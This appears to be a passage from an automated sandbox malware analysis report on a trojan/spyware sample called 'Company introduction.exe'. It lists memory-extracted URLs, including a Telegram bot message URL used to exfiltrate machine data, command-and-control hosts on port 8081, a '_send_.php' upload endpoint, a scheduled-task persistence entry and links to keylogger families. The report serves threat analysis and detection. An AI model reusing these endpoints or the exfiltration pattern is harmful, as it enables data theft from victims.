                                        https://api.telegram.org/botCompany introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers?Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.office.com/lBCompany introduction.exe, 00000006.00000002.2941471703.0000000003291000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.tiro.comCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.krCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enFzXKnGk.exe, 0000000C.00000002.2940815636.0000000003506000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://varders.kozow.com:8081Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.sajatypeworks.comCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20aCompany introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.typography.netDCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCompany introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://checkip.dyndns.org/qCompany introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://chrome.google.com/webstore?hl=enlBCompany introduction.exe, 00000006.00000002.2941471703.0000000003260000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaseCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.comCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleaseCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cnCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCompany introduction.exe, 00000000.00000002.1732379162.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000000.00000002.1732379162.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1756873041.0000000002998000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.comCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.office.com/FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003537000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.comCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://checkip.dyndns.orgCompany introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.carterandcone.comlCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://aborters.duckdns.org:8081Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.founder.com.cn/cnCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anotherarmy.dns.army:8081Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.jiyu-kobo.co.jp/Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$Company introduction.exe, 00000006.00000002.2941471703.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://reallyfreegeoip.orgCompany introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fontbureau.com/designers8Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCompany introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedCompany introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              		high

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.21.48.1
                                                                                                                              		reallyfreegeoip.orgUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                              149.154.167.220
                                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                                              		62041TELEGRAMRUfalse
                                                                                                                              193.122.6.168
                                                                                                                              		checkip.dyndns.comUnited States
                                                                                                                              		31898ORACLE-BMC-31898USfalse

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                              Analysis ID:1591636
                                                                                                                              Start date and time:2025-01-15 08:38:07 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 7m 5s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:17
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:Company introduction.exe
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@18/11@3/3
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 98%
                                                                                                                              • Number of executed functions: 183
                                                                                                                              • Number of non-executed functions: 33
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.253.45
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              02:39:00API Interceptor2435794x Sleep call for process: Company introduction.exe modified
                                                                                                                              02:39:02API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                              02:39:03API Interceptor1592920x Sleep call for process: FzXKnGk.exe modified
                                                                                                                              07:39:02Task SchedulerRun new task: FzXKnGk path: C:\Users\user\AppData\Roaming\FzXKnGk.exe

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              104.21.48.1ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.vilakodsiy.sbs/vq3j/
                                                                                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.axis138ae.shop/j2vs/
                                                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                              • twirpx.org/administrator/index.php
                                                                                                                              SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.antipromil.site/7ykh/
                                                                                                                              149.154.167.220rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                      q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  193.122.6.168rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                  ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • checkip.dyndns.org/

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  checkip.dyndns.comrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 193.122.6.168
                                                                                                                                                  RFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 158.101.44.242
                                                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 132.226.247.73
                                                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 132.226.8.169
                                                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 132.226.247.73
                                                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 193.122.130.0
                                                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 158.101.44.242
                                                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 132.226.247.73
                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 132.226.8.169
                                                                                                                                                  reallyfreegeoip.orgrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  RFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.64.1
                                                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 104.21.64.1
                                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.48.1
                                                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.16.1
                                                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.64.1
                                                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 104.21.80.1
                                                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.16.1
                                                                                                                                                  api.telegram.orgrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.220
